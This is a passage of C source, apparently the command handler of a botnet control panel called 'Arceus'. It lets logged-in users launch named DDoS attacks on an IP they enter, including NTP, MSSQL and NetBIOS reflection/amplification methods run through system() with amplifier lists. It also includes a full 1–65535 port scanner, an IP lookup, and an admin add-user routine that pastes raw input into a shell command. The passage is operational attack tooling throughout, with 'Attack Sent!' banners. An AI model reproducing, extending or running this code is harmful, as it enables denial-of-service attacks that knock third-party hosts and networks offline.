- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./hun-fun %s", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: HUN-FUN \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ASS-CRK") || strstr(arceus_buffer_size, ".ass-crk")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./ass-crk %s", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ASS-CRK \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".EFT-PWR") || strstr(arceus_buffer_size, ".eft-pwr")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./eft-pwr %s", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: EFT-PWR \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".PMP-PMP") || strstr(arceus_buffer_size, ".pmp-pmp")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/Reflection/pmp-pmp %s 62141 amp/lists/pmp-pmp.txt 2 -1 300", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: PMP-PMP \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".ZCH-CRI") || strstr(arceus_buffer_size, ".zch-cri")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./zch-cri %s", iptarget); // Default Time Has Been Set To 30 Seconds. Default Port Is 62141
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ZCH-CRI \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- //if (strstr(arceus_buffer_size, ".test") || strstr(arceus_buffer_size, ".TEST")) // System Command Function
- //{
- //char iptarget[5000]; // Char Every Line For Output Communication
- //char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- //snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- //trim_removev2(iptarget); // Trim [iptarget]
- //char *ipkill[5000]; // Creating A System Function
- //trim_removev2(ipkill); // Trim [ipkill]
- //sprintf(ipkill, "./amp/methods/layer4/v1/custom/pmp-pmp/pmp-pmp %s amp/methods/layer4/v1/custom/pmp-pmp/pmp.txt 2 500;", iptarget);
- //sprintf(ipkill, "./amp/methods/layer4/v1/reflection/mssql/mssql %s amp/methods/layer4/v1/reflection/mssql/mssql.txt 2 -1 500;", iptarget);
- //sprintf(ipkill, "./amp/methods/layer4/v1/reflection/netbios/netbios %s amp/methods/layer4/v1/reflection/netbios/netbios.txt 2 -1 300;", iptarget);
- //sprintf(ipkill, "./amp/methods/layer4/v1/reflection/ntp/ntp %s amp/methods/layer4/v1/reflection/ntp/ntp.txt 2 -1 500", iptarget);
- //system(ipkill); // System Execution
- //sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ZCH-CRI \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- //if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- //}
- if (strstr(arceus_buffer_size, ".test") || strstr(arceus_buffer_size, ".TEST")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/layer4/v1/custom/pmp-pmp/pmp-pmp %s amp/methods/layer4/v1/custom/pmp-pmp/pmp.txt 2 500;", iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ZCH-CRI \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".test") || strstr(arceus_buffer_size, ".TEST")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/mssql/mssql %s amp/methods/layer4/v1/reflection/mssql/mssql.txt 2 -1 500;", iptarget);
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/netbios/netbios %s amp/methods/layer4/v1/reflection/netbios/netbios.txt 2 -1 300;", iptarget);
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/ntp/ntp %s amp/methods/layer4/v1/reflection/ntp/ntp.txt 2 -1 500", iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ZCH-CRI \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".test") || strstr(arceus_buffer_size, ".TEST")) // System Command Function
- {
- char iptarget[5000]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Create Delimiter
- snprintf(iptarget, sizeof(iptarget), "%s", token+strlen(token)+1); // String Comparison From User Input - Using Token Size
- trim_removev2(iptarget); // Trim [iptarget]
- char *ipkill[5000]; // Creating A System Function
- trim_removev2(ipkill); // Trim [ipkill]
- sprintf(ipkill, "./amp/methods/layer4/v1/custom/pmp-pmp/pmp-pmp %s amp/methods/layer4/v1/custom/pmp-pmp/pmp.txt 2 500;", iptarget);
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/mssql/mssql %s amp/methods/layer4/v1/reflection/mssql/mssql.txt 2 -1 500;", iptarget);
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/netbios/netbios %s amp/methods/layer4/v1/reflection/netbios/netbios.txt 2 -1 300;", iptarget);
- sprintf(ipkill, "./amp/methods/layer4/v1/reflection/ntp/ntp %s amp/methods/layer4/v1/reflection/ntp/ntp.txt 2 -1 500", iptarget);
- system(ipkill); // System Execution
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m ║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: ZCH-CRI \e[91m ╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: SPECIAL \e[91m ║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else if (strstr(arceus_buffer_size, ".KILL") || strstr(arceus_buffer_size, ".kill")) // System Command Function -- [TESTING HERE]
- {
- char command[70];
- trim_removev2(command);
- strcpy(command, "python scripts/IPHM_Attack_Process_Killer.py" );
- system(command);
- sprintf(arceus, " \r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else if (strstr(arceus_buffer_size, ".nts off") || strstr(arceus_buffer_size, ".tfs off") || strstr(arceus_buffer_size, ".sds off") || strstr(arceus_buffer_size, ".pos off") || strstr(arceus_buffer_size, ".cos off") || strstr(arceus_buffer_size, ".sos off") || strstr(arceus_buffer_size, ".nes off") || strstr(arceus_buffer_size, ".mss off") || strstr(arceus_buffer_size, ".tss off"))// System Command Function -- [TESTING HERE]
- {
- char command[70];
- trim_removev2(command);
- strcpy(command, "python scripts/IPHM_Scanner_Process_Killer.py" );
- system(command);
- sprintf(arceus, " \r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if (strstr(arceus_buffer_size, ".install") || strstr(arceus_buffer_size, ".INSTALL")) // System Command Function -- [TESTING HERE]
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char command[50];
- trim_removev2(command);
- strcpy(command, "python install.py" );
- system(command);
- sprintf(arceus, "\e[91mAll IP-Header Modification Based methods downloaded!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "\e[91mOwners Only!!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if (strstr(arceus_buffer_size, "resolve") || strstr(arceus_buffer_size, "RESOLVE")) // Resolve Command - Function Requires 'resolve.h'
- {
- char *internet_protocol[100]; // Char Every Line For Output Communication
- char *token = strtok(arceus_buffer_size, " "); // Char Every Line For Output Communication
- char *url = token+sizeof(token); // Char Every Line For Output Communication
- trim_removev2(url); // Trim [Url]
- resolve(url, internet_protocol); // Using User Input - Stated As 'Url' or 'IP' - We Use This In The Resolver Function
- sprintf(arceus, "\e[91mResolved \e[91m[\e[91m%s\e[91m] \e[91mto \e[91m[\e[91m%s\e[91m]\r\n", url, internet_protocol); // Resolver Output
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- if(strstr(arceus_buffer_size, ".adduser") || strstr(arceus_buffer_size, ".ADDUSER") || strstr(arceus_buffer_size, "adduser") || strstr(arceus_buffer_size, "ADDUSER")) // Add User Function, This Allows Us To Easily Add A New User To The Network, Without Having To Manually Edting The login.txt
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char *token = strtok(arceus_buffer_size, " "); // Char Every Line For Output Communication
- char *userinfo = token+sizeof(token); // Char Every Line For Output Communication
- trim_removev2(userinfo); // Trim [Userinfo]
- char *uinfo[50]; // Char Every Line For Output Communication
- sprintf(uinfo, "echo '%s' >> arceus.txt", userinfo); // We Are Editing The Following File --> 'arceus.txt' Which Is Our 'Login.txt'
- system(uinfo); // Access Of System Functions In Order To Edit The File From The Communicating Screen
- printf("\e[91m[\e[91mArceus\e[91m] \e[91mUser\e[91m:[\e[91m%s\e[91m] \e[91mAdded User\e[91m:[\e[91m%s\e[91m]\n", accounts[find_line].username, userinfo); // Adding User - Output
- sprintf(arceus, "\e[91m[\e[91mArceus\e[91m] \e[91mUser\e[91m:[\e[91m%s\e[91m] \e[91mSuccessfully Added!\r\n", userinfo); // Adding User - Output
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- sprintf(arceus, "Admins Only!\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- // else if(strstr(arceus_buffer_size, ".deluser") || strstr(arceus_buffer_size, ".DELUSER")
- // {
- // if(strcmp(Admin, accounts[find_line].identification_type) == 0)
- // {
- // int kdm;
- // char deluser[50];
- // if(send(clear_arceus_broadcast, "\x1b[1;36mUsername: \x1b[37m", strlen("\x1b[1;36mUsername: \x1b[37m"), MSG_NOSIGNAL) == -1) goto finish_integer;
- // memset(deluser, 0, sizeof(deluser));
- // while(buffer_size_string_compare(deluser, sizeof deluser, clear_arceus_broadcast) < 1)
- // {
- // trim_removev2(deluser);
- // if(strlen(deluser) < 3) continue;
- // break;
- // }
- // trim_removev2(deluser);
- // rmstr(deluser, ACC_FILE);
- // sprintf(arceus, "\x1b[1;36mDeleted User \x1b[0m(\x1b[1;36m%s\x1b[0m)...\r\n", deluser);
- // if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer;
- // for(kdm = 0; kdm < max_file_descriptor_value; kdm++)
- // {
- // if(!managers[kdm].transmitted_successfully) continue;
- // if(!strcmp(managers[kdm].username, deluser))
- // {
- // close(kdm);
- // managers[kdm].transmitted_successfully = 0;
- // memset(managers[kdm].username, 0, sizeof(managers[kdm].username));
- // }
- // }
- // }
- // else
- // {
- // sprintf(arceus, "\x1b[31mPermission Denied, Admins Only!\x1b[37m\r\n");
- // if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- // }
- // }
- else if(strstr(arceus_buffer_size, "PORTSCAN") || strstr(arceus_buffer_size, "portscan")) // Portscan Function - Easy And Stable Port Scan [II]
- {
- int unknown_integer; // We State X As The Unknown Integer [This Will Be The User Input]
- int timeout_portscan = 3; // Create An Integer For The Time-Out, This Will Minimise Network Saturation
- int start_port = 1; // Create An Integer For The First Port - [We Need A Start Point Of Course]
- int end_port = 65535; // Create An Integer For The First Port - [We Need A End Point Of Course]
- char host[16]; // Char Every Line For Output Communication
- trim_removev2(arceus_buffer_size); // Trim [Buffer]
- char *token = strtok(arceus_buffer_size, " "); // Char Every Line For Output Communication
- snprintf(host, sizeof(host), "%s", token+strlen(token)+1); // Check Host, Create '+1' Token, Then Use 'Botnet'
- snprintf(arceus, sizeof(arceus), "\e[91m[\e[91mArceus\e[91m] \e[91mChecking ports \e[91m[\e[91m%d\e[91m] \e[91mthrough \e[91m[\e[91m%d\e[91m] \e[91mFor IP\e[91m:[\e[91m%s\e[91m]\x1b[0m\r\n", start_port, end_port, host);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // We Will Terminate Concurrent Function And Carry on.. Use Values As Follows 'unknown_integer'
- for(unknown_integer=start_port; unknown_integer < end_port; unknown_integer++) // We Start From The Lowest Port To Biggest Port
- {
- int socket_propulsion_data = -1; // Create Integer For Socket - '-1'
- struct timeval timeout; // We Are Creating A Timing System - This Is For Timeout, Creating Struct. For 'timeval-timeout'
- struct sockaddr_in sock; // Struct. Creation Of socket_propulsion_data-Address
- // set timeout secs
- timeout.tv_sec = timeout_portscan; // Timeout - tv
- timeout.tv_usec = 0; // Timeout - tv_usec
- socket_propulsion_data = socket(AF_INET, SOCK_STREAM, 0); // Create Our TCP Socket Using AF_INET
- setsockopt(socket_propulsion_data, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)); // Setsockopt -- This Is Our RCV Time -- [Received]
- setsockopt(socket_propulsion_data, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); // Setsockopt -- This Is Our SND Time -- [Sending]
- sock.sin_family = AF_INET; // Socket-Sin, Family -- Using AF_INET
- sock.sin_port = htons(unknown_integer); // Using 'htons' Set As The 'unknown_integer' Value
- sock.sin_addr.s_addr = inet_addr(host); // State The 'inet' As The Host, Suffix Has Been Created, So Process Is Independent
- if(connect(socket_propulsion_data, (struct sockaddr *)&sock, sizeof(sock)) == -1) close(socket_propulsion_data); // If The Packet Returned, It Will Not Be Displayed
- else
- { // If The Packet Returns From Handshake, The Port Is Open
- snprintf(arceus, sizeof(arceus), "\e[91m[\e[91mArceus\e[91m] \e[91mPort\e[91m:[\e[91m%d\e[91m] \e[91mis open For IP\e[91m:[\e[91m%s\e[91m]\x1b[0m\r\n", unknown_integer, host);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- memset(arceus, 0, sizeof(arceus)); // Fill In Data Block, Let's Keep Our Communication Stable
- close(socket_propulsion_data); // Kill Our Open Socket - TCP
- }
- } // Scan Is Done -- Output
- snprintf(arceus, sizeof(arceus), "\e[91m[\e[91mArceus\e[91m] \e[91mScan on IP\e[91m:[\e[91m%s\e[91m] \e[91mis Done!\x1b[0m\r\n", host);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else if(strstr(arceus_buffer_size, "iplookup") || strstr(arceus_buffer_size, "IPLOOKUP"))
- {
- char myhost[20]; // Char Every Line For Output Communication
- char ki11[1024]; // Char Every Line For Output Communication // Ip Lookup Function
- snprintf(ki11, sizeof(ki11), "%s", arceus_buffer_size); // Using Kill Prefix For Dynamic Integer
- trim_removev2(ki11); // Trim [ki11]
- char *token = strtok(ki11, " "); // Char Every Line For Output Communication
- snprintf(myhost, sizeof(myhost), "%s", token+strlen(token)+1); // Host Size Statement, This Is For OCMIS [PSL-0012]
- if(atoi(myhost) >= 8) // Bigger Than Int Value Of 8
- {
- int IPL_DATA; // Create Integer For 'IPL_DATA' -- Used In Each Value, For Time-Out Sequence
- int ipl_integer_size = -1; // State IPLSOCK == -1 [Shouldn't Class With The Open Socket Via TCP]
- char buffer_IPL[1024]; // Char Every Line For Output Communication
- int source_port = 80; // Set Default Connection Port As [62141]
- char ip_lookup_headers[1024]; // Char Every Line For Output Communication
- struct timeval timeout; // Create Struct. For Time Interval Timeout
- struct sockaddr_in sock; // Create Another Struct. For Socket-Address -> Socket
- timeout.tv_sec = 4; // 4 second timeout
- timeout.tv_usec = 0; // 0 second -- Run Function
- ipl_integer_size = socket(AF_INET, SOCK_STREAM, 0); // Running Socketstream, Using Set Values - We Are Concurrent
- sock.sin_family = AF_INET; // Socket Sin == Sin.family, Engages Better With Output Connection
- sock.sin_port = htons(source_port); // htons, Is Dependent On The Connection Port -- Integer States Are Constant
- sock.sin_addr.s_addr = inet_addr(iplookup_host); // Coherent Connection - Will Kill Socket If Lookup Is Incomplete
- if(connect(ipl_integer_size, (struct sockaddr *)&sock, sizeof(sock)) == -1) // Check Using ipl_integer_size, If Connection Has Been Reached
- {
- //printf("[\x1b[31m-\x1b[37m] Failed to connect to iplookup host server...\n");
- sprintf(arceus, "\x1b[31m[IPLookup] Failed to connect to iplookup server...\x1b[0m\r\n", myhost);
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- }
- else // Else...
- {
- //printf("[\x1b[32m+\x1b[37m] Connected to iplookup server :)\n"); This Below, Is Our Header Sent To The API, This Shouldn't Cause Problems..
- snprintf(ip_lookup_headers, sizeof(ip_lookup_headers), "GET /iplookup.php?host=%s HTTP/1.1\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding:gzip, deflate, sdch\r\nAccept-Language:en-US,en;q=0.8\r\nCache-Control:max-age=0\r\nConnection:keep-alive\r\nHost:%s\r\nUpgrade-Insecure-Requests:1\r\nUser-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\r\n\r\n", myhost, iplookup_host);
- if(send(ipl_integer_size, ip_lookup_headers, strlen(ip_lookup_headers), 0))
- {
- //printf("[\x1b[32m+\x1b[37m] Sent request headers to iplookup api!\n");
- sprintf(arceus, "\e[91m[\e[91mArceus\e[91m] \e[91mGathering Information On IP:\e[91m[\e[91m%s\e[91m]\r\n", myhost); // IP Info -- Output
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- char ch; // Char Every Line For Output Communication
- int retrv = 0; // Create Integer For 'Retrv' -- [OPEN INT == 0]
- uint32_t header_parser = 0; // Let's Create A Header Parse, Under 32-bit Unsigned Integer, This Allows Accurate Value Statement
- while (header_parser != 0x0D0A0D0A) // Set Header Parse Value = '0x0D0A0D0A'
- {
- if ((retrv = read(ipl_integer_size, &ch, 1)) != 1) // Check For Success, Using IPL socket_propulsion_data
- break;
- header_parser = (header_parser << 8) | ch; // Change Parser Value, Below '8'
- }
- memset(buffer_IPL, 0, sizeof(buffer_IPL)); // Fill Data Block, Stabilises On-going Process, Using Socket-Buffer
- while(IPL_DATA = read(ipl_integer_size, buffer_IPL, 1024)) // Set Ret, To Read -- Buffer Size Stated Coherently, [1024]
- {
- buffer_IPL[IPL_DATA] = '\0'; // Break, Below Is An Alternative If A Second Function Is Added
- /*if(strlen(buffer_IPL) > 1)
- printf("\x1b[36m%s\x1b[37m\n", buffer);*/
- }
- //printf("%s\n", buffer_IPL); <---- This Would Be Used, If No Error Handling Is Needed. The User Will Not Be Informed With DETAILS
- if(strstr(buffer_IPL, "<title>404")) // Use Header Title + Error 404 [Assumption Error = 404]
- {
- char iplookup_host_token[20]; // Char Every Line For Output Communication
- sprintf(iplookup_host_token, "%s", iplookup_host); // %s Is Our Host Token, Set This As Our DISPLAY Variable
- int ip_prefix = atoi(strtok(iplookup_host_token, ".")); // Create Integer For The IP Prefix, This Is Defined Using Our Received host_token
- sprintf(arceus, "\x1b[31m[IPLookup] Failed, API can't be located on server %d.*.*.*:62141\x1b[0m\r\n", ip_prefix); // Error Handling -- No API Was Found, Defined By Host Token
- memset(iplookup_host_token, 0, sizeof(iplookup_host_token)); // Fill Data Block Again, We Do This For Every Function, To Stop Instability and Saturation
- }
- else if(strstr(buffer_IPL, "nickers")) // Hehe.. ( ͡° ͜ʖ ͡°)
- sprintf(arceus, "\x1b[31m[IPLookup] Failed, Hosting server needs to have php installed for api to work...\x1b[0m\r\n"); // Error Handling, Hosting Has No PHP..
- else sprintf(arceus, "[+] \x1b[0m--- Results\x1b[0m --- [+]\r\n\x1b[0m%s\x1b[37m\r\n", buffer_IPL); // Output Results, From IP Lookup
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else
- {
- //printf("[\x1b[31m-\x1b[37m] Failed to send request headers...\n");
- sprintf(arceus, "\x1b[31m[IPLookup] Failed to send request headers...\r\n"); // Header Send[ Failed -- Probably Due To Some Sort Of DDoS Protection, [Cloudflare, Blazing, Etc..]
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- close(ipl_integer_size); // Terminate Allocated Statement, Open Socket, May Cause Numerous Network Problems If Not Killed...
- }
- }
- if(strstr(arceus_buffer_size, ".logout") || strstr(arceus_buffer_size, ".LOGOUT")) // Logout Command, So The User Exits Safely And In Fashion.. Of course...
- {
- printf("\e[91m[\e[91mArceus\e[91m] \e[91mUser\e[91m:[\e[91m%s\e[91m] \e[91mHas Logged Out!\n", accounts[find_line].username, arceus_buffer_size); // We Are Attempting To Logout!
- FILE *arceus_log_file;// We Are Attempting To Logout!
- arceus_log_file = fopen("logs/Arceus_Logout.log", "a");// We Are Attempting To Logout!
- fprintf(arceus_log_file, "\e[91m[\e[91mArceus\e[91m]\e[91m User\e[91m:[\e[91m%s\e[91m]\e[91m Has Logged Out!\n", accounts[find_line].username, arceus_buffer_size);// We Are Attempting To Logout!
- fclose(arceus_log_file);// We Are Attempting To Logout!
- goto finish_integer; // We Are Dropping Down to finish_integer:
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "STOP")) // STOP OUR ATTACK
- { // Let Us Continue Our Journey!
- sprintf(arceus, " \e[91m╔═══════════════════════════════╗\r\n \e[91m║ \e[91mWhy did you stop? ): \e[91m║\r\n \e[91m║ \e[91mTesting something perhaps? \e[91m║\r\n \e[91m║ \e[91mMeh, its oki, trim_integer stopped </3 \e[91m║\r\n \e[91m╚═══════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "CRUSH")) // CRUSH ATTACK
- { // Let Us Continue Our Journey!
- sprintf(arceus, " \e[91m╔══════════════════════╗\r\n \e[91m║ \e[91mAttack Sent! \e[91m║ ╔════════════════════════════╗\r\n \e[91m║ \e[91mMethod: CRUSH \e[91m╠══════╣ \e[91m. STOP to stop the attack! \e[91m║\r\n \e[91m║ \e[91mUsage: STD unknown_integer TCP \e[91m║ ╚════════════════════════════╝\r\n \e[91m╚══════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) return;
- } // Let Us Continue Our Journey!
- if(strstr(arceus_buffer_size, "COMBO")) // COMBO ATTACK
- { // Let Us Continue Our Journey!
